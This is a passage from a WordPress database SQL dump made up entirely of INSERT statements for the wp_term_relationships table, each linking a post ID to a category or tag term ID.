INSERT INTO `wp_term_relationships` VALUES (1111, 195, 0); 
INSERT INTO `wp_term_relationships` VALUES (1111, 198, 0); 
INSERT INTO `wp_term_relationships` VALUES (1113, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (1113, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (1113, 200, 0); 
INSERT INTO `wp_term_relationships` VALUES (1113, 201, 0); 
INSERT INTO `wp_term_relationships` VALUES (1115, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (1115, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (1115, 202, 0); 
INSERT INTO `wp_term_relationships` VALUES (1115, 203, 0); 
INSERT INTO `wp_term_relationships` VALUES (1115, 204, 0); 
INSERT INTO `wp_term_relationships` VALUES (1115, 205, 0); 
INSERT INTO `wp_term_relationships` VALUES (1115, 206, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 117, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 199, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 205, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 207, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 208, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 209, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 210, 0); 
INSERT INTO `wp_term_relationships` VALUES (1117, 211, 0); 
INSERT INTO `wp_term_relationships` VALUES (1121, 212, 0); 
INSERT INTO `wp_term_relationships` VALUES (1121, 213, 0); 
INSERT INTO `wp_term_relationships` VALUES (1121, 214, 0); 
INSERT INTO `wp_term_relationships` VALUES (1121, 215, 0); 
INSERT INTO `wp_term_relationships` VALUES (1128, 219, 0); 
INSERT INTO `wp_term_relationships` VALUES (1128, 220, 0); 
INSERT INTO `wp_term_relationships` VALUES (1128, 221, 0); 
INSERT INTO `wp_term_relationships` VALUES (1128, 222, 0); 
INSERT INTO `wp_term_relationships` VALUES (1128, 512, 0); 
INSERT INTO `wp_term_relationships` VALUES (1135, 212, 0); 
INSERT INTO `wp_term_relationships` VALUES (1135, 223, 0); 
INSERT INTO `wp_term_relationships` VALUES (1135, 224, 0); 
INSERT INTO `wp_term_relationships` VALUES (1135, 225, 0); 
INSERT INTO `wp_term_relationships` VALUES (1135, 226, 0); 
INSERT INTO `wp_term_relationships` VALUES (1149, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1149, 227, 0); 
INSERT INTO `wp_term_relationships` VALUES (1149, 424, 0); 
INSERT INTO `wp_term_relationships` VALUES (1149, 425, 0); 
INSERT INTO `wp_term_relationships` VALUES (1149, 426, 0); 
INSERT INTO `wp_term_relationships` VALUES (1149, 427, 0); 
INSERT INTO `wp_term_relationships` VALUES (1152, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1152, 228, 0); 
INSERT INTO `wp_term_relationships` VALUES (1164, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1164, 175, 0); 
INSERT INTO `wp_term_relationships` VALUES (1164, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1164, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1164, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1164, 439, 0); 
INSERT INTO `wp_term_relationships` VALUES (1164, 440, 0); 
INSERT INTO `wp_term_relationships` VALUES (1166, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1166, 175, 0); 
INSERT INTO `wp_term_relationships` VALUES (1166, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1166, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1166, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1166, 439, 0); 
INSERT INTO `wp_term_relationships` VALUES (1166, 440, 0); 
INSERT INTO `wp_term_relationships` VALUES (1168, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1168, 175, 0); 
INSERT INTO `wp_term_relationships` VALUES (1168, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1168, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1168, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1168, 439, 0); 
INSERT INTO `wp_term_relationships` VALUES (1168, 440, 0); 
INSERT INTO `wp_term_relationships` VALUES (1178, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1178, 176, 0); 
INSERT INTO `wp_term_relationships` VALUES (1178, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1178, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1178, 431, 0); 
INSERT INTO `wp_term_relationships` VALUES (1178, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1181, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1181, 176, 0); 
INSERT INTO `wp_term_relationships` VALUES (1181, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1181, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1181, 431, 0); 
INSERT INTO `wp_term_relationships` VALUES (1181, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1183, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1183, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1183, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1183, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1183, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1183, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1183, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1185, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1185, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1185, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1185, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1185, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1185, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1185, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1187, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1187, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1187, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1187, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1187, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1187, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1187, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1189, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1189, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1189, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1189, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1189, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1189, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1189, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1191, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1191, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1191, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1191, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1191, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1191, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1191, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1193, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1193, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1193, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1193, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1193, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1193, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1193, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1198, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1198, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1198, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1198, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1198, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1198, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1198, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1209, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1209, 177, 0); 
INSERT INTO `wp_term_relationships` VALUES (1209, 429, 0); 
INSERT INTO `wp_term_relationships` VALUES (1209, 430, 0); 
INSERT INTO `wp_term_relationships` VALUES (1209, 432, 0); 
INSERT INTO `wp_term_relationships` VALUES (1209, 437, 0); 
INSERT INTO `wp_term_relationships` VALUES (1209, 438, 0); 
INSERT INTO `wp_term_relationships` VALUES (1212, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1212, 180, 0); 
INSERT INTO `wp_term_relationships` VALUES (1216, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1216, 181, 0); 
INSERT INTO `wp_term_relationships` VALUES (1221, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1221, 229, 0); 
INSERT INTO `wp_term_relationships` VALUES (1224, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1224, 229, 0); 
INSERT INTO `wp_term_relationships` VALUES (1227, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1227, 229, 0); 
INSERT INTO `wp_term_relationships` VALUES (1230, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1230, 230, 0); 
INSERT INTO `wp_term_relationships` VALUES (1263, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1263, 232, 0); 
INSERT INTO `wp_term_relationships` VALUES (1263, 233, 0); 
INSERT INTO `wp_term_relationships` VALUES (1263, 234, 0); 
INSERT INTO `wp_term_relationships` VALUES (1263, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1263, 236, 0); 
INSERT INTO `wp_term_relationships` VALUES (1268, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1268, 232, 0); 
INSERT INTO `wp_term_relationships` VALUES (1268, 233, 0); 
INSERT INTO `wp_term_relationships` VALUES (1268, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1268, 236, 0); 
INSERT INTO `wp_term_relationships` VALUES (1268, 237, 0); 
INSERT INTO `wp_term_relationships` VALUES (1270, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1270, 230, 0); 
INSERT INTO `wp_term_relationships` VALUES (1276, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1276, 232, 0); 
INSERT INTO `wp_term_relationships` VALUES (1276, 233, 0); 
INSERT INTO `wp_term_relationships` VALUES (1276, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1276, 236, 0); 
INSERT INTO `wp_term_relationships` VALUES (1276, 238, 0); 
INSERT INTO `wp_term_relationships` VALUES (1278, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1278, 232, 0); 
INSERT INTO `wp_term_relationships` VALUES (1278, 233, 0); 
INSERT INTO `wp_term_relationships` VALUES (1278, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1278, 236, 0); 
INSERT INTO `wp_term_relationships` VALUES (1278, 239, 0); 
INSERT INTO `wp_term_relationships` VALUES (1287, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1287, 231, 0); 
INSERT INTO `wp_term_relationships` VALUES (1287, 236, 0); 
INSERT INTO `wp_term_relationships` VALUES (1287, 240, 0); 
INSERT INTO `wp_term_relationships` VALUES (1287, 241, 0); 
INSERT INTO `wp_term_relationships` VALUES (1287, 242, 0); 
INSERT INTO `wp_term_relationships` VALUES (1292, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1292, 243, 0); 
INSERT INTO `wp_term_relationships` VALUES (1292, 244, 0); 
INSERT INTO `wp_term_relationships` VALUES (1292, 245, 0); 
INSERT INTO `wp_term_relationships` VALUES (1292, 340, 0); 
INSERT INTO `wp_term_relationships` VALUES (1292, 434, 0); 
INSERT INTO `wp_term_relationships` VALUES (1292, 435, 0); 
INSERT INTO `wp_term_relationships` VALUES (1338, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1338, 245, 0); 
INSERT INTO `wp_term_relationships` VALUES (1338, 247, 0); 
INSERT INTO `wp_term_relationships` VALUES (1338, 248, 0); 
INSERT INTO `wp_term_relationships` VALUES (1338, 249, 0); 
INSERT INTO `wp_term_relationships` VALUES (1338, 340, 0); 
INSERT INTO `wp_term_relationships` VALUES (1338, 462, 0); 
INSERT INTO `wp_term_relationships` VALUES (1344, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1344, 231, 0); 
INSERT INTO `wp_term_relationships` VALUES (1344, 236, 0); 
INSERT INTO `wp_term_relationships` VALUES (1344, 240, 0); 
INSERT INTO `wp_term_relationships` VALUES (1344, 242, 0); 
INSERT INTO `wp_term_relationships` VALUES (1344, 250, 0); 
INSERT INTO `wp_term_relationships` VALUES (1384, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1384, 251, 0); 
INSERT INTO `wp_term_relationships` VALUES (1384, 252, 0); 
INSERT INTO `wp_term_relationships` VALUES (1384, 253, 0); 
INSERT INTO `wp_term_relationships` VALUES (1384, 341, 0); 
INSERT INTO `wp_term_relationships` VALUES (1428, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1428, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1428, 254, 0); 
INSERT INTO `wp_term_relationships` VALUES (1428, 255, 0); 
INSERT INTO `wp_term_relationships` VALUES (1428, 516, 0); 
INSERT INTO `wp_term_relationships` VALUES (1431, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1431, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1431, 254, 0); 
INSERT INTO `wp_term_relationships` VALUES (1431, 256, 0); 
INSERT INTO `wp_term_relationships` VALUES (1431, 516, 0); 
INSERT INTO `wp_term_relationships` VALUES (1435, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1435, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1435, 254, 0); 
INSERT INTO `wp_term_relationships` VALUES (1435, 257, 0); 
INSERT INTO `wp_term_relationships` VALUES (1435, 516, 0); 
INSERT INTO `wp_term_relationships` VALUES (1481, 15, 0); 
INSERT INTO `wp_term_relationships` VALUES (1525, 216, 0); 
INSERT INTO `wp_term_relationships` VALUES (1601, 259, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 263, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 264, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 265, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 266, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 267, 0); 
INSERT INTO `wp_term_relationships` VALUES (1637, 268, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 108, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 118, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 269, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 270, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 271, 0); 
INSERT INTO `wp_term_relationships` VALUES (1638, 272, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 273, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 274, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 275, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 276, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 277, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 278, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 279, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 280, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 281, 0); 
INSERT INTO `wp_term_relationships` VALUES (1643, 282, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 283, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 284, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 285, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 286, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 287, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 288, 0); 
INSERT INTO `wp_term_relationships` VALUES (1644, 299, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 265, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 289, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 290, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 291, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 292, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 293, 0); 
INSERT INTO `wp_term_relationships` VALUES (1645, 298, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 265, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 272, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 294, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 295, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 296, 0); 
INSERT INTO `wp_term_relationships` VALUES (1646, 297, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 263, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 264, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 300, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 301, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 302, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 303, 0); 
INSERT INTO `wp_term_relationships` VALUES (1647, 304, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 305, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 306, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 307, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 308, 0); 
INSERT INTO `wp_term_relationships` VALUES (1648, 309, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 105, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 261, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 310, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 311, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 312, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 313, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 314, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 315, 0); 
INSERT INTO `wp_term_relationships` VALUES (1649, 316, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 260, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 317, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 318, 0); 
INSERT INTO `wp_term_relationships` VALUES (1662, 453, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 260, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 317, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 318, 0); 
INSERT INTO `wp_term_relationships` VALUES (1664, 453, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 192, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 260, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 318, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 319, 0); 
INSERT INTO `wp_term_relationships` VALUES (1666, 454, 0); 
INSERT INTO `wp_term_relationships` VALUES (1668, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1668, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1668, 262, 0); 
INSERT INTO `wp_term_relationships` VALUES (1668, 320, 0); 
INSERT INTO `wp_term_relationships` VALUES (1668, 321, 0); 
INSERT INTO `wp_term_relationships` VALUES (1668, 322, 0); 
INSERT INTO `wp_term_relationships` VALUES (1670, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1670, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1670, 262, 0); 
INSERT INTO `wp_term_relationships` VALUES (1670, 320, 0); 
INSERT INTO `wp_term_relationships` VALUES (1670, 322, 0); 
INSERT INTO `wp_term_relationships` VALUES (1673, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1673, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1673, 262, 0); 
INSERT INTO `wp_term_relationships` VALUES (1673, 322, 0); 
INSERT INTO `wp_term_relationships` VALUES (1673, 323, 0); 
INSERT INTO `wp_term_relationships` VALUES (1673, 324, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 325, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 327, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 328, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 332, 0); 
INSERT INTO `wp_term_relationships` VALUES (1677, 527, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 325, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 326, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 327, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 328, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 329, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 330, 0); 
INSERT INTO `wp_term_relationships` VALUES (1679, 331, 0); 
INSERT INTO `wp_term_relationships` VALUES (1681, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1681, 17, 0); 
INSERT INTO `wp_term_relationships` VALUES (1681, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1681, 325, 0); 
INSERT INTO `wp_term_relationships` VALUES (1681, 327, 0); 
INSERT INTO `wp_term_relationships` VALUES (1681, 328, 0); 
INSERT INTO `wp_term_relationships` VALUES (1681, 333, 0); 
INSERT INTO `wp_term_relationships` VALUES (1683, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1683, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1683, 132, 0); 
INSERT INTO `wp_term_relationships` VALUES (1683, 325, 0); 
INSERT INTO `wp_term_relationships` VALUES (1683, 335, 0); 
INSERT INTO `wp_term_relationships` VALUES (1683, 337, 0); 
INSERT INTO `wp_term_relationships` VALUES (1683, 338, 0); 
INSERT INTO `wp_term_relationships` VALUES (1690, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1690, 341, 0); 
INSERT INTO `wp_term_relationships` VALUES (1690, 344, 0); 
INSERT INTO `wp_term_relationships` VALUES (1690, 345, 0); 
INSERT INTO `wp_term_relationships` VALUES (1690, 346, 0); 
INSERT INTO `wp_term_relationships` VALUES (1693, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1693, 253, 0); 
INSERT INTO `wp_term_relationships` VALUES (1693, 341, 0); 
INSERT INTO `wp_term_relationships` VALUES (1693, 347, 0); 
INSERT INTO `wp_term_relationships` VALUES (1693, 348, 0); 
INSERT INTO `wp_term_relationships` VALUES (1695, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1695, 341, 0); 
INSERT INTO `wp_term_relationships` VALUES (1695, 345, 0); 
INSERT INTO `wp_term_relationships` VALUES (1695, 346, 0); 
INSERT INTO `wp_term_relationships` VALUES (1695, 349, 0); 
INSERT INTO `wp_term_relationships` VALUES (1695, 350, 0); 
INSERT INTO `wp_term_relationships` VALUES (1697, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1697, 341, 0); 
INSERT INTO `wp_term_relationships` VALUES (1697, 345, 0); 
INSERT INTO `wp_term_relationships` VALUES (1697, 346, 0); 
INSERT INTO `wp_term_relationships` VALUES (1697, 351, 0); 
INSERT INTO `wp_term_relationships` VALUES (1697, 352, 0); 
INSERT INTO `wp_term_relationships` VALUES (1705, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1705, 318, 0); 
INSERT INTO `wp_term_relationships` VALUES (1705, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1705, 448, 0); 
INSERT INTO `wp_term_relationships` VALUES (1705, 449, 0); 
INSERT INTO `wp_term_relationships` VALUES (1705, 450, 0); 
INSERT INTO `wp_term_relationships` VALUES (1706, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1706, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1706, 245, 0); 
INSERT INTO `wp_term_relationships` VALUES (1706, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1707, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1707, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1707, 245, 0); 
INSERT INTO `wp_term_relationships` VALUES (1707, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1707, 428, 0); 
INSERT INTO `wp_term_relationships` VALUES (1708, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1708, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1708, 245, 0); 
INSERT INTO `wp_term_relationships` VALUES (1708, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1708, 353, 0); 
INSERT INTO `wp_term_relationships` VALUES (1708, 354, 0); 
INSERT INTO `wp_term_relationships` VALUES (1710, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1710, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1710, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1710, 355, 0); 
INSERT INTO `wp_term_relationships` VALUES (1710, 356, 0); 
INSERT INTO `wp_term_relationships` VALUES (1710, 357, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 106, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 187, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 235, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 245, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 358, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 359, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 360, 0); 
INSERT INTO `wp_term_relationships` VALUES (1711, 361, 0); 
INSERT INTO `wp_term_relationships` VALUES (1712, 2, 0); 
INSERT INTO `wp_term_relationships` VALUES (1712, 343, 0); 
INSERT INTO `wp_term_relationships` VALUES (1712, 362, 0); 
INSERT INTO `wp_term_relationships` VALUES (1712, 363, 0); 
INSERT INTO `wp_term_relationships` VALUES (1712, 364, 0); 
INSERT INTO `wp_term_relationships` VALUES (1712, 365, 0); 
INSERT INTO `wp_term_relationships` VALUES (1712, 366, 0); 
INSERT INTO `wp_term_relationships` VALUES (1713, 2, 0); 
